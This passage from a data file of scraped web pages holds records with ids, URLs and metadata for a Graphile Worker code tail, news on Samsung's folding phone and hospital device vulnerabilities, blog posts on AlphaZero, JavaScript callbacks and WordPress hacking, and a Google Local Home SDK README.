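// Elsewhere (e.g. in an HTTP handler), queue work instead of doing it inline:
//   await quickAddJob({ connectionString: "postgres:///my_db" }, "send_email", { to: "user@example.com" });
// or straight from SQL / a trigger (assumed helper installed by the library):
//   SELECT graphile_worker.add_job('send_email', json_build_object('to', 'user@example.com'));

main().catch((err) => {
  console.error(err);
  process.exit(1);
});
```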
To help us develop this software sustainably, we ask all individuals and businesses that use it to help support its ongoing maintenance and development via sponsorship.
And please give some love to our featured sponsors 🤩:
- The Guild *
- Dovetail *
- Stellate *
- Steelhead *
- LatchBio *

\* *Sponsors the entire Graphile suite*
18,402,883 | https://www.bbc.com/news/technology-46130071 | Samsung folding smartphone revealed to developers | Leo Kelion | # Samsung folding smartphone revealed to developers
**Samsung has unveiled a folding handset at an event in San Francisco.**
It described its Infinity Flex Display as "the foundation of the smartphone of tomorrow" and said it intended to start production within months.
When unfolded, the device resembles a 7.3in (18.5cm) tablet. When closed, a separate smaller "cover display" on the handset's other side comes into use.
Samsung has teased the concept for more than five years and had been vying with Huawei to show off a device first.
However, both were upstaged a week ago when little-known start-up Royole unveiled a foldable phone of its own.
Unlike Royole's FlexPai, Samsung obscured the final look of its device. It placed it in a case to hold off revealing the design until a later event.
It also did not disclose how it will brand the phone.
However, it did reveal that the forthcoming handset would be able to run three apps at once.
Justin Denison, the executive who unveiled the handset, noted that when folded up the device fitted "neatly inside" a jacket pocket thanks to the displays involved being thinner than those on earlier phones.
Unlike the FlexPai, the two sides of Samsung's device lie flat when closed. But this comes at the cost of there being noticeable breaks in its bezel, at least on the prototype demoed.
Shipments of Samsung's smartphones were 13.4% lower in the July-to-September quarter than for the same period the previous year, according to market research firm IDC.
Although the sector as a whole shrank over the 12 months, the South Korean firm still underperformed, with its market share slipping from 22.1% to 20.3%.
But analysts say a flexible phone has the potential to strengthen Samsung's brand and boost interest in its wider family of devices.
"We've already had squeezable, swivel, clamshell and even foldable phones," commented IDC's Marta Pinto.
"Differentiation is super important. Samsung's smartphone sales are declining as it faces serious competition from Huawei and other Chinese brands.
"If it can bring a new and really interesting device to the market it could be a chance to regain momentum and return to growth."
Google is also holding a developer event of its own for Android programmers.
One of its engineering chiefs announced that it would soon add support to the operating system to allow other manufacturers to create foldable phones of their own.
It also tweeted an animation of the concept in action.
## Analysis: Dave Lee, North America technology reporter
Finally, some interesting innovation in the smartphone space. Or smartphone and tablet space, I guess you could say.
A new form factor can be a huge boost to device-makers, but only if it makes sense.
A flip phone made previously big devices pocket-sized, and then smartphones brought button-less interaction to our palms.
But what will foldable screens bring?
One of the reasons why Samsung teased this device at its developers conference was to give software-makers a chance to think about how to make the most of the new possibilities a foldable screen might bring.
There's a reason why just about every new smartphone up until today looked the same: it worked.
To go foldable, there's likely to be big trade-offs on price, screen quality and perhaps weight - the device Samsung teased today did look chunky.
I'll hold back on a verdict until I get a chance to hold one for myself.
**IBM Simon:** The first mobile phone to offer a touchscreen user-interface - but its battery only lasted an hour.
**Siemens S10: **The first handset with a colour display - although only red, green, blue and white could be shown.
**LG Prada: **The handset debuted a capacitive touchscreen - detecting finger taps by changes in the display's electrical field rather than pressure.
**iPhone: **Apple made use of "multi-touch", detecting several points of contact - allowing pinch-to-zoom and other interactions.
**Nokia N85:** First phone with an OLED (organic light-emitting diode) display, letting it show deeper blacks and better contrast.
**Samsung Galaxy Note: **Although not the first "phablet", the handset proved there was demand for a 5+ inch display, despite claims it was "comically huge".
**LG G Flex: **The curved design was derided as being a gimmick, but points the way to the true "bendy" phones of the future.
**Sharp Aquos Crystal: **The phone's "edgeless" look foreshadowed today's trend to keep bezels to a minimum.
**Samsung Galaxy Note Edge: **Samsung's first handset to wrap its screen over one its sides used the extra space for notifications and app shortcuts.
**Sony Xperia Z5 Premium: **The smartphone premiered a 4K display before it was easy to obtain such ultra-high definition mobile content.
**Essential Phone: **The start-up beat Apple to featuring a camera notch in its display, which allowed the rest of the screen to extend upwards.
**Royole FlexPai:** The California-based start-up surprised the industry when it revealed the "world's first foldable phone" last month. | true | true | true | Samsung unveils a folding handset that turns into a tablet at an event in San Francisco. | 2024-10-12 00:00:00 | 2018-11-07 00:00:00 | reportagenewsarticle | bbc.com | BBC News | null | null |
|
18,699,539 | http://www.cachestocaches.com/2018/12/toward-real-world-alphazero/ | DeepMind's AlphaZero and The Real World | Gregory J Stein | AlphaZero is incredible. If you have yet to read DeepMind’s blog post about their recent paper in Science detailing the *ins and outs* of their legendary game-playing AI, I recommend you do so. In it, DeepMind’s scientists describe an intelligent system capable of playing the games of Go, Chess, and Shogi at superhuman levels. Even legendary chess Grandmaster Garry Kasparov says the moves selected by the system demonstrate a “superior understanding” of the games. Even more remarkable is that AlphaZero, a successor to the well-known AlphaGo and AlphaGo Zero, is trained entirely via *self-play* — it was able to learn good strategies without any meaningful human input.
So do these results imply that Artificial General Intelligence is soon-to-be a solved problem? Hardly. There is a massive difference between an artificially intelligent agent capable of playing chess and a robot that can solve practical real-world tasks, like exploring a building it's never seen before to find someone's office. AlphaZero's intelligence derives from its ability to make predictions about how a game is likely to unfold: it learns to predict which moves are better than others and uses this information to think a few moves ahead. As it learns to make increasingly accurate predictions, AlphaZero gets better at rejecting "bad moves" and is able to simulate deeper into the future. But the real world is almost immeasurably complex, and, to act in the real world, a system like AlphaZero must decide between a nearly infinite set of possible actions at every instant in time. Overcoming this limitation is not merely a matter of throwing more computational power at the problem:
Using AlphaZero to solve real problems will require a change in the way computers represent and think about the world.
Yet despite the complexity inherent in the real world, humans are still capable of making predictions about how the world behaves and using this information to make decisions. To understand how, we consider how humans learn to play games.
Humans are actually pretty good at playing games like Chess and Go, which is why outperforming humans at these games have historically marked milestones for progress in AI. Like AlphaZero, humans develop an intuition for how they expect the game to evolve. Expert human players use this intuition to prefer likely moves and configurations of the world and to inform better decision making.
The conclusion that experts rely more on structured knowledge than on analysis is supported by a rare case study of an initially weak chess player, identified only by the initials D.H., who over the course of nine years rose to become one of Canada’s leading masters by 1987. Neil Charness, professor of psychology at Florida State University, showed that despite the increase in the player’s strength, he analyzed chess positions no more extensively than he had earlier, relying instead on a vastly improved knowledge of chess positions and associated strategies.
The game of Chess is often analyzed in terms of abstract board positions and Chess openings/endgames are also frequently taught as groups of moves, as in the Rule of the Square. Rather than thinking of individual moves, people are capable of thinking in terms of *sequences of moves*, which allows them to think about the board deeper into the future, once the sequence is executed. Expert players learn to develop an *abstract* representation of the board, in which fine-grained details may be ignored. Imagining the impact of moves and move sequences becomes a question of how the overall structure of the board will change, rather than the precise positions of each of the pieces.
It could be argued that AlphaZero is also capable of recognizing abstract patterns, since it too is capable of making predictions about who is likely to win. However, AlphaZero is structured such that it must explicitly construct future states of the board when imagining the future and cannot learn to plan completely in the abstract.
How does this ability to think in the abstract translate to decision-making in the real world? Humans do this all the time. As I write this, I am at my computer desk in my apartment. If the fire alarm were to go off, indicating that I should leave the building, my instinct is to head towards my apartment door and go down the hall to the stairs, which will then bring me outside. By contrast, a robot might start planning one step at a time, expending enormous computational effort to decide whether walking should begin with the left or right foot, a decision that has little bearing on the overall solution.
For a robot, the planning problem becomes even more complicated when it finds itself in an unfamiliar building. The robot can no longer compute a precise plan, since planning a collision-free trajectory is effectively impossible when the locations of all the obstacles are unknown. Humans are capable of overcoming the computational issues that hold back machines because we think in the abstract. I know that bathrooms are likely to be dead ends, while hallways usually are not. If my goal is to leave the building, entering a bathroom is probably unwise.
So how can we encourage a system like AlphaZero to think in terms of these human-like abstract actions?
Understanding how to marry abstract decision-making and AlphaZero requires looking at how AlphaZero works. To make decisions, AlphaZero needs to be able to forward simulate the game: it knows exactly what the board will look like after it makes a move, and what the game will look like after the opponent makes their move, and so on.
For games like Chess and Go, expanding this tree of moves is trivial. In the real world, however, this same process is extremely difficult, even for an AI. If you don’t believe me, take a look at some of the recent progress in video frame prediction, which aims to predict the most likely next few frames of a video. The results are often *pretty reasonable*, but are often oddly pixelated and are (for now) easily distinguishable from real video. In this problem, the machine learning algorithm has a pretty tough time making predictions more than a few frames into the future. Imagine instead that the robot were to try to predict the likelihood of *every possible future video frame* for hundreds of frames into the future. The problem is so complex that even generating the data we would need to train such an algorithm is hopelessly difficult.
If we instead use an abstract model of the world, imagining the future becomes much easier. I no longer care *exactly* what the world looks like, but instead try to make predictions about the *types of things* that can happen. In the context of my *building exit problem*, I should not have to imagine what color tile a bathroom has or precisely how large it is to understand that if I enter a bathroom while trying to leave a building, I will likely have to turn around and exit it again first.
Framed this way, abstractions allow us to represent the world as if it were a chess board: the *moves* correspond to physically moving between rooms or hallways or leaving the building. Equipped with an abstract model of the world, a system like AlphaZero can learn to predict how the world will evolve in terms of these abstract concepts. Using this abstract model of the world to make decisions is therefore relatively straightforward for a system like AlphaZero: the number of actions (and subsequent outcomes) is vastly reduced, allowing us to use familiar strategies for decision-making.
There are still practical challenges associated with using abstractions during planning that have thus far limited AI, like AlphaZero, from using them in general. I discuss these later.
In fact *using* abstract models for planning is often much simpler then *creating* abstract models. So where do abstract models come from?
*Disclaimer*: This section contains work my colleagues and I have done. While our work does not realize an *AlphaZero for the real world*, we present ideas that are useful for understanding how one might construct such a system.
To begin to answer this question, we can limit the scope of our inquiry to a simpler problem: navigation in an unknown environment. Imagine that a robot is placed in the middle of a university building and capable of detecting the local geometry of the environment: i.e. walls and obstacles. The robot’s (albeit simple) goal is to reach a point that’s roughly 100 meters away in a part of the building it cannot see.
When faced with this task, what does a simple algorithm do? Most robots avoid the difficulties associated with making predictions about the unknown part of the building by ignoring it. The robot plans as if all unknown space is free space. Naturally, this assumption is a poor one. A robot using this strategy to navigate constantly enters people’s offices in an effort to reach the goal only to “discover” that many of these were dead ends. It often needs to retrace its steps and return to the hallway before it can make further progress towards the goal. This video shows a simulated robot doing just that:
Instead of planning like this, we would like to develop an abstract representation of the world so that the robot can make better decisions. As the robot builds its map of the world, boundaries between free space and unknown space appear whenever part of the map is occluded by obstacles or walls. We use each one of these boundaries, or *frontiers*, to represent an abstract action: an action consists of the robot traveling to the selected boundary and exploring the unknown space beyond it in an effort to reach the goal. In our model, there are two possible “outcomes” from executing an action: (1) we reach the goal and planning terminates, or (2) we fail to reach the goal and must select a different action.
Using machine learning, we estimate the likelihood that each boundary leads to the goal, which allows us to better estimate how expensive each move will be. Deciding which action to take involves a tree search procedure similar to that of AlphaZero, we simulate trying each action and its possible outcomes in sequence and select the action that has the lowest expected cost. On a toy example, the procedure looks something like this:
This procedure allows us to use our abstract model of the world for planning. Using our procedure, in combination with the learned probability that each boundary leads to the goal, our simulated robot reaches the goal much more quickly than in the example above.
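To give a flavour of what this style of decision-making looks like in code, here is a drastically simplified sketch of expected-cost selection over frontiers. The interface, cost model, and numbers are invented for illustration, and unlike the tree search described above it uses a single fixed fallback cost rather than recursing over the remaining frontiers, so it is not the planner from our work.

```typescript
// Drastically simplified: pick the frontier (abstract action) with the lowest
// expected cost, assuming that on failure we back out and pay a fallback cost.
interface Frontier {
  name: string;
  costToReach: number;      // travel cost from the robot to this boundary
  probGoalBeyond: number;   // learned estimate that the goal lies beyond it
  exploreCost: number;      // cost of exploring beyond it and coming back if it's a dead end
  costBeyondIfGoal: number; // estimated remaining cost when it does lead to the goal
}

function expectedCost(f: Frontier, fallbackCost: number): number {
  const success = f.probGoalBeyond * (f.costToReach + f.costBeyondIfGoal);
  const failure = (1 - f.probGoalBeyond) * (f.costToReach + f.exploreCost + fallbackCost);
  return success + failure;
}

function chooseFrontier(frontiers: Frontier[], fallbackCost = 100): Frontier {
  return frontiers.reduce((best, f) =>
    expectedCost(f, fallbackCost) < expectedCost(best, fallbackCost) ? f : best
  );
}

// Example: a hallway is less likely to dead-end than an office door,
// so it wins even though the office is closer.
const action = chooseFrontier([
  { name: "hallway", costToReach: 10, probGoalBeyond: 0.7, exploreCost: 20, costBeyondIfGoal: 60 },
  { name: "office",  costToReach: 4,  probGoalBeyond: 0.1, exploreCost: 8,  costBeyondIfGoal: 40 },
]);
console.log(action.name); // "hallway"
```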
As we try to deploy robots and AI systems to solve complex, real-world problems, it has become increasingly clear that our machine learning algorithms can benefit from being designed so that they mirror the structure of the problem they are tasked to solve. Humans are extremely good at using structure to solve problems:
Humans’ capacity for combinatorial generalization depends critically on our cognitive mechanisms for representing structure and reasoning about relations. We represent complex systems as compositions of entities and their interactions, such as judging whether a haphazard stack of objects is stable. We use hierarchies to abstract away from fine-grained differences, and capture more general commonalities between representations and behaviors, such as parts of an object, objects in a scene, neighborhoods in a town, and towns in a country. We solve novel problems by composing familiar skills and routines […] When learning, we either fit new knowledge into our existing structured representations, or adjust the structure itself to better accommodate (and make use of) the new and the old.
In the previous section, we developed an abstract model of the world specifically tailored to solving a single problem. While our model — which uses boundaries between free space and the unknown to define abstract actions — is effective for the task of navigation, it would certainly be useless if the robot were instead commanded to *clean the dishes*. It remains an open question how to construct an artificial agent that can “adjust the structure itself to better accommodate” new data or tasks.
While our work is certainly a practical step towards realizing an *AlphaZero for the real world*, we still have a lot to learn. Where do good abstractions come from? What makes one abstraction better than another? How can abstractions be learned?
As always, I welcome discussion in the comments below or on Hacker News. Feel free to ask questions, share your thoughts, or let me know of some research you would like to share.
I would also like to extend my thanks to my coauthor Chris Bradley and the members of the Robust Robotics Group at MIT, who provided constructive feedback on this article. | true | true | true | Using DeepMind's AlphaZero AI to solve real problems will require a change in the way computers represent and think about the world. In this post, we discuss how abstract models of the world can be used for better AI decision making and discuss recent work of ours that proposes such a model for the task of navigation. | 2024-10-12 00:00:00 | 2018-12-16 00:00:00 | website | cachestocaches.com | GregoryJStein | null | null |
|
30,001,592 | https://www.theverge.com/2022/1/19/22891440/internet-connected-medical-devices-vulnerable | Half of internet-connected devices in hospitals are vulnerable to hacks, report finds | Nicole Wetsman | Over half of internet-connected devices used in hospitals have a vulnerability that could put patient safety, confidential data, or the usability of a device at risk, according to a new report from the healthcare cybersecurity company Cynerio.
The report analyzed data from over 10 million devices at over 300 hospitals and health care facilities globally, which the company collected through connectors attached to the devices as part of its security platform.
The most common type of internet-connected device in hospitals was an infusion pump. These devices can remotely connect to electronic medical records, pull the correct dosage of a medication or other fluid, and dispense it to the patient. Infusion pumps were also the devices most likely to have vulnerabilities that could be exploited by hackers, the report found — 73 percent had a vulnerability. Experts worry that hacks into devices like these, which are directly connected to patients, could be used to hurt or threaten to hurt people directly. Someone could theoretically access those systems and change the dosage of a medication, for example.
Other common internet-connected devices are patient monitors, which can track things like heart rate and breathing rate, and ultrasounds. Both of those types of devices were in the top 10 list in terms of numbers of vulnerabilities.
Health care organizations are now a major target for hackers, and while a direct attack on internet-connected medical devices doesn’t seem to have happened yet, experts think it’s a possibility. The more active threat is from groups that break into hospital systems through a vulnerable device and lock up the hospital’s digital networks — leaving doctors and nurses unable to access medical records, devices, and other digital tools — and demand a ransom to unlock them. These attacks have escalated over the past few years, and they slow down hospital functions to the extent that it can hurt patients.
Cynerio’s report notes that most of the vulnerabilities in medical devices are easily fixable: they’re due to weak or default passwords or a recall notice that the organization hasn’t acted on. Many healthcare organizations just don’t have the resources or personnel to keep systems up to date and might not know if there’s an update or alert concerning one of their devices.
But reports like this one, combined with the growing frequency of ransomware attacks, is pushing more health care organizations to invest in cybersecurity, experts say. “I think this is reaching a level of criticality that is getting the attention of CEOs and board rooms,” Ed Gaudet, CEO and founder at cybersecurity company Censinet, told *The Verge* this fall. | true | true | true | IV pumps, ultrasounds, and monitors were at risk. | 2024-10-12 00:00:00 | 2022-01-19 00:00:00 | article | theverge.com | The Verge | null | null |
|
12,798,063 | http://inhabitat.com/this-uk-supercomputer-can-predict-winter-weather-a-year-ahead/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
26,217,280 | https://www.youtube.com/watch?v=_zvGdYMBnuI&ab_channel=Let%27sStartABusiness | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,280,585 | http://boxbase.org/entries/2016/aug/8/javascript-pyramids/ | Javascript continent and the callback pyramids of hell | Henri Tuhola | # Javascript continent and the callback pyramids of hell
I am not the first to write about these wonderful creations of man. Some call them the Pyramids of doom. Thousands and thousands of small pyramids stand in the Javascript source code of popular web applications. Everyone has made at least two of them, and they remain in their place. From time to time, passing maintainers break a foot on them and rewrite some of the pyramids into multiple, slightly smaller pyramids. This is how they keep multiplying.
You can tell there's a callback pyramid growing from very simple cues:
```
xxxxxx(xxxx, function(xxxxxxx) {
    xxxxxx(function(xxxxxxx) {
    }xxx, ).xxxxxx(xxx, function(xxxxxxx) {
        xxxxxx(function(xxxxxxx) {
            xxxxxx;
        }, xxxxxxx);
    });
});
```
Many nested functions creep their way up, forming a tip, some of the largest sweeping the ceiling limit of 80 columns. Often they divide before they grow very large.
Doom pyramids feed on error handling code. To get what they yearn for, they destroy the exception handling mechanism that would carry errors to where it is relevant to handle them. This forces programmers to constantly feed the pyramids with more error handling code, encouraging their growth.
## Origins
Doom pyramids originate from the disruption of linear logic and from restrictions on control flow constructs. They cannot thrive in an environment where execution can wait for results or fail by ordinary means.
```
xxxx = xxxxxxx(xxx, xxx, xx);
xxxxx(xxxx, xxx, xx);
xxxx = xxxxxxxxxx(xxx, xxx, xx).xxxx();
xxxx = xxxxxx.xxxx(xxx, xxx, xx);
```
There is no concept of 'wait for results' in Javascript, so ordinary programs undergo a violent conversion into continuation passing style as they evolve, turning into the dreaded doom pyramids.
Fear of the damaging and uncontrolled concurrency that might occur from waiting makes Javascript a fertile breeding ground for different kinds of doom pyramids.
## Subspecies
As programmers try to fix the symptom and not the original problem, various subspecies of doom pyramids have formed. They take shape as constructs that resemble languages of their own.
These subspecies have their own advanced control flow constructs that allow them to live a life of their own. They fight with each other, and with the Javascript they protrude from.
### Promises
Promises originated as recorded sentences of OOP evangelists. They were eventually rewritten into a complete language of their own, one that nearly amounts to a whole interpreted language in its own right.
Internally they contain an interpreter to represent sequential control flow, and they inject more promises into promises to represent code that makes calls that wait for subsequent results. The interpreter-likeness makes promises heavyweight, creating very interesting optimization problems wherever they are used.
Lack of understanding that there's a unique language in place results in code that sometimes confusingly resembles the doom pyramids themselves.
Promises can be told apart by specific keywords they use to represent control flow:
```
xxxxxx.xxxx(xxxxx, xxxx).then(function(xxx) {
    return xxx.xxxx(xxxxxx);
}).then(function(xx) {
    var xxxx = xx;
    return xxxx.xxx()
}).catch(function(xxxx) {
    xxxxxx(xxxx);
});
```
Promises breed by providing control flow constructs that can wait for results. Programmers see these shiny things and sometimes put them to good use. This way the parasites themselves end up dragged long distances.
### Async/Await
Async and await are an advanced form of promises that became a true language: a duplicate of the original with two new keywords and hidden, duplicated control flow constructs. Asyncs and awaits require a transpiler to function, but they slowly asphyxiate the original language out of their way.
Async and await spread by programmers' ignorance, cross-pollinating other languages that didn't have any problems to start with.
To avoid the original fear that concurrent execution would break atomicity constraints in existing programs, async and await produce an identical control flow system on top of the language they infect, with the difference that there are keywords 'async' and 'await' sprinkled around according to a rule.
```
var xxxx = async function() {
    var xxx = new XxxxXx();
    var xxxx = await xxx.xxx_xxx();
    return xxxx;
};
```
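For concreteness, here is the same small two-step file read written in the three styles described above, using Node's standard fs APIs (the file names are arbitrary):

```typescript
import { readFile } from "node:fs";
import { readFile as readFileP } from "node:fs/promises";

// 1. Callback style: each dependent step nests one level deeper,
//    and error handling is repeated at every level.
readFile("a.txt", "utf8", (err, a) => {
  if (err) return console.error(err);
  readFile(a.trim(), "utf8", (err2, b) => {
    if (err2) return console.error(err2);
    console.log(b.length);
  });
});

// 2. Promise chain: flat, with a single catch at the end.
readFileP("a.txt", "utf8")
  .then((a) => readFileP(a.trim(), "utf8"))
  .then((b) => console.log(b.length))
  .catch(console.error);

// 3. async/await: reads like sequential code and can use try/catch again.
async function main(): Promise<void> {
  try {
    const a = await readFileP("a.txt", "utf8");
    const b = await readFileP(a.trim(), "utf8");
    console.log(b.length);
  } catch (err) {
    console.error(err);
  }
}
main();
```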
This was from the book of "Javascript's parasites".
Here are some other nice resources that may provoke a thought:
- A silly broad compiler question in the stackexchange.com
- Someone conjuring syntax design guidelines from his hat
- Collection of lisp fanboy quotes
Also, as always, there are lots of errors in this blog post. I think it's worthwhile to check into r/programming if you wonder about what's right and what's wrong. | true | true | true | null | 2024-10-12 00:00:00 | 2012-01-11 00:00:00 | website | boxbase.org | boxbase.org | null | null |
|
215,355 | http://www.techcrunch.com/2008/06/11/my-blog-was-hacked-is-yours-next-huge-wordpress-security-issues/ | Wordpress Security Issues Lead To Mass Hacking. Is Your Blog Next? | TechCrunch | Nik Cubrilovic | Due to its popularity as a blogging platform, WordPress has become a prime target for hackers looking to take over blogs for search-engine optimization (SEO) of other sites they control, traffic-redirection and other purposes. Recently there have been a spate of automated attacks which take advantage of recently discovered security vulnerabilities in WordPress.
To date, WordPress has been keeping up with the security holes by releasing updates within a few days of new exploits being found, but in the past few days new exploits have appeared that nobody seems to have answers for.
One such attack actually happened to me back in January, when I noticed that a blog I was hosting had been littered with tens of thousands of pages relating to pharmaceuticals and adult material. Someone had gotten access to the blog and literally created new pages, such as this one:
The blog was running the most recent version of WordPress available at the time, and I traced the entry-point back to a simple flaw in a script that was not adequately filtering user input. To its credit, WordPress released a new version that patched the vulnerability (among others) and asked its users to upgrade.
That was six months ago, but in May it happened again, this time with a new security hole and again it occurred a few days before WordPress was able to respond with an update. The problem is that most blog owners aren’t aware of the threat posed by hackers targeting blogs, as a successful attack may not tip off the blog owner in any way. The security vulnerabilities in WordPress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening.
**If you are currently not running the latest version of WordPress then there is a very high chance that your site has already been compromised.**
The common results of a successful attack are that a backdoor is installed (meaning the hacker can go back in and enter your blog at a later date), passwords for all users are downloaded, or spam pages are generated. At that point, you are no longer in complete control of your blog, including all the content and anything else in the same database that the WordPress install has access to.
Hackers are taking advantage of the open-source nature of the software to analyze the source code and test it for potential vulnerabilities. It is then left up to developers and users to detect, track down, and then close off the vulnerabilities in the code that attackers are using. The pattern seems to be that when a new hole is found, it is broadly exploited, then developers rush out a patch and a new release. Thankfully most of the damage inflicted by the automated exploits can be reversed with an upgrade, though in some cases you can be left with thousands of pages and images to clean up (and they are usually well hidden).
For users of WordPress, backups are essential, as are frequent updates, monitoring your blog usage and tracking the official WordPress blog and other blogs for news of any new security holes. There are also plenty of guides and applications available that can assist a site owner in further securing their blog.
It is unknown just how many WordPress blogs are infected (I have seen instances of double infection, where a previously hacked host had been hacked again), but as an indicator, across the ten or more WordPress blogs that TechCrunch and I have access to, we can see over 100 requests daily for these various security holes. Stories about hacked blogs are becoming more and more [common](http://blogsearch.google.com/blogsearch?hl=en&q=wordpress%20hacked&ie=UTF-8&scoring=d), and the ongoing concern is that the newest security hole could be found and exploited at any moment.
**Update**: In the comments, Anil Dash from Six Apart has linked to a post on their blog about MovableType vs WordPress in terms of security. | true | true | true | Due to its popularity as a blogging platform, Wordpress has become a prime target for hackers looking to take over blogs for search-engine optimization | 2024-10-12 00:00:00 | 2008-06-11 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
694,312 | http://news.duke.edu/2009/06/phonepoint.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,291,812 | https://github.com/actions-on-google/smart-home-local | GitHub - google-home/smart-home-local: Local Home SDK sample | Google-Home | This sample demonstrates integrating a smart home Action with the Local Home SDK. The Local Home SDK allow developers to add a local path to handle smart home intents by running TypeScript (or JavaScript) directly on Google Home smart speakers and Nest smart displays. The sample supports the following protocols along with the companion virtual device:
- **Device Discovery:** UDP, mDNS or UPnP
- **Control:** UDP, TCP, or HTTP
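For orientation, the TypeScript app at the heart of a sample like this has roughly the following shape. This is a heavily simplified sketch, not the sample's actual code, and the response payloads and device ids are placeholder assumptions:

```typescript
/// <reference types="@google/local-home-sdk" />

// Heavily simplified sketch of a Local Home SDK app: identify the locally
// discovered device, then handle EXECUTE intents on the local network.
const app = new smarthome.App("1.0.0");

app
  .onIdentify((request) => {
    // The scan data (UDP/mDNS/UPnP) arrives in the request; report which device
    // was found so it can be matched against the cloud SYNC data.
    console.log("IDENTIFY request", request);
    return {
      requestId: request.requestId,
      intent: smarthome.Intents.IDENTIFY,
      payload: {
        device: {
          id: "strand1",             // assumption: the cloud-side device id
          verificationId: "strand1", // assumption: the local id used for matching
        },
      },
    };
  })
  .onExecute((request) => {
    // A real handler would build the UDP/TCP/HTTP command for the device here
    // and report per-device success or failure; this sketch only acknowledges.
    console.log("EXECUTE request", request);
    return new smarthome.Execute.Response.Builder()
      .setRequestId(request.requestId)
      .build();
  })
  .listen()
  .then(() => console.log("Local Home SDK app ready"));
```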
- Node.js LTS 10.16.0+
- Firebase CLI
Note: This project uses Cloud Functions for Firebase, which requires you to associate a billing account with your project. Actions projects do not create a billing account by default. See Create a new billing account for more information.
- Create a new *Smart Home* project in the Actions console
- Deploy the placeholder smart home provider to *Cloud Functions for Firebase* using the same Project ID:

  ```
  npm install --prefix functions/
  npm run firebase --prefix functions/ -- use ${PROJECT_ID}
  npm run deploy --prefix functions/
  ```

- In *Develop > Actions*, set the following configuration values to match the *Cloud Functions for Firebase* deployment:
  - **Fulfillment**: `https://${REGION}-${PROJECT_ID}.cloudfunctions.net/smarthome`
- In *Develop > Account linking*, set the following configuration values:
  - **Client ID**: `placeholder-client-id`
  - **Client secret**: `placeholder-client-secret`
  - **Authorization URL**: `https://${REGION}-${PROJECT_ID}.cloudfunctions.net/authorize`
  - **Token URL**: `https://${REGION}-${PROJECT_ID}.cloudfunctions.net/token`
- Click *Save*
Choose one of the supported discovery protocols that you would like to test, and create a new scan configuration in the Actions console.
Note: These are the default values used by the virtual device for discovery. If you choose to use different values, you will need to supply those parameters when you set up the virtual device.
- In *Develop > Actions > Configure local home SDK > Add device scan configuration*, click **New scan config**.
- For UDP discovery:
  - **Broadcast address**: `255.255.255.255`
  - **Discovery packet**: `A5A5A5A5`
  - **Listen port**: `3312`
  - **Broadcast port**: `3311`
- For mDNS discovery:
  - **mDNS service name**: `_sample._tcp.local`
  - **Name**: `.*\._sample\._tcp\.local` (Note: The **Name** attribute value is a regular expression.)
- For UPnP discovery:
  - **UPNP service type**: `urn:sample:service:light:1`
- Click *Save*
Choose one of the supported control protocols that you would like to test. You will use this value to configure both the cloud fulfillment and the virtual device.
- `UDP`: Send execution commands to the target device as a UDP payload.
- `TCP`: Send execution commands to the target device as a TCP payload.
- `HTTP`: Send execution commands to the target device as an HTTP request.
The local fulfillment sample supports running as a **single end device** or a
**hub/proxy device**. This is determined by the number of channels you configure.
A device with more than one channel will be treated as a hub by the local
fulfillment sample code.
Configure the cloud service to report the correct device `SYNC`
metadata based on your
chosen device type and control protocol. Here are some examples for configuring the service for different use cases:
-
Report a single device (
`strand1`
) controlled via UDP commands:`npm run firebase --prefix functions/ -- functions:config:set \ strand1.leds=16 strand1.channel=1 \ strand1.control_protocol=UDP npm run deploy --prefix functions/`
-
Report three individual light strands connected through a proxy (
`hub1`
) and controlled via HTTP commands:`npm run firebase --prefix functions/ -- functions:config:set \ hub1.leds=16 hub1.channel=1,2,3 \ hub1.control_protocol=HTTP npm run deploy --prefix functions/`
The companion virtual device is a Node.js app that emulates strands of RGB LEDs controllable using the Open Pixel Control protocol and displays the results to the terminal in a colorful way.
- Virtual device discovery settings must match the attributes provided in
**Device Scan Configuration**in*Develop > Actions > Configure local home SDK*.- If you modify the attributes in your
**Device Scan Configuration**, you must configure the virtual device accordingly. See the virtual device README for more details on configuring the discovery attributes.
- If you modify the attributes in your
- Virtual device control protocol should match
`control_protocol`
used with`functions:config:set`
when setting up cloud fulfillment. - Configure the device type as
**end device**or**hub/proxy**based on the number of`--channel`
parameters provided. A device with more than one channel will be treated as a hub.
Note: The virtual device needs to listen on the same local network as the Home device.
Here are some examples for configuring the virtual device for different use cases:
-
Start the virtual device as a single device (
`strand1`
) discovered via UDP broadcast and controlled with UDP commands:`npm install --prefix device/ npm start --prefix device/ -- \ --device_id strand1 \ --discovery_protocol UDP \ --control_protocol UDP \ --channel 1`
-
Start the virtual device as a hub (
`hub1`
) discovered via mDNS and controlling three individual strands with HTTP commands:`npm install --prefix device/ npm start --prefix device/ -- \ --device_id hub1 \ --discovery_protocol MDNS \ --control_protocol HTTP \ --channel 1 \ --channel 2 \ --channel 3`
Note: See the virtual device README for more details on the supported configuration options.
Serve the sample app locally from the same local network as the Home device, or deploy it to a publicly reacheable URL endpoint.
-
Start the local development server:
`npm install --prefix app/ npm start --prefix app/`
Note: The local development server needs to listen on the same local network as the Home device in order to be able to load the Local Home SDK application.
-
Go to the smart home project in the Actions console
-
In
*Develop > Actions > Configure local home SDK*- Set the
*testing URL for Chrome*to the one displayed in the local development server logs. - Set the
*testing URL for Node*to the one displayed in the local development server logs. - Under
*Add capabilities*- Check
*Support local query*.
- Check
- Set the
-
Click
*Save*
```
npm install --prefix app/
npm run build --prefix app/
npm run deploy --prefix app/ -- --project ${FIREBASE_PROJECT_ID}
```
- Go to the smart home project in the Actions console
- In
*Develop > Actions > Configure local home SDK*- Set the
*testing URL for Chrome*to:`http://${FIREBASE_PROJECT_ID}.firebaseapp.com/web/index.html`
- Set the
*testing URL for Node*to:`http://${FIREBASE_PROJECT_ID}.firebaseapp.com/node/bundle.js`
- Under
*Add capabilities*- Check
*Support local query*.
- Check
- Set the
- Click
*Save*
- In
*Develop > Invocation*, set the*Display name*for the smart home Action. - In
*Test*, click*Start testing* - In the
*Google Home app*- Click the '+' sign
- Select
*Work with Google* - In the list of providers, select your smart home Action by
*Display name*prefixed with`[test]`
- Click
*Link* - Click
*Complete Account Link*
- Select the linked devices and click on
*Add to a room*. - Reboot the Google Home Device
- Open
`chrome://inspect`
- Locate the Local Home SDK application and click
`inspect`
to launch the Chrome developer tools. - Try the following query
`Set the light color to magenta`
- It should display the light strand(s) in a colorful way:
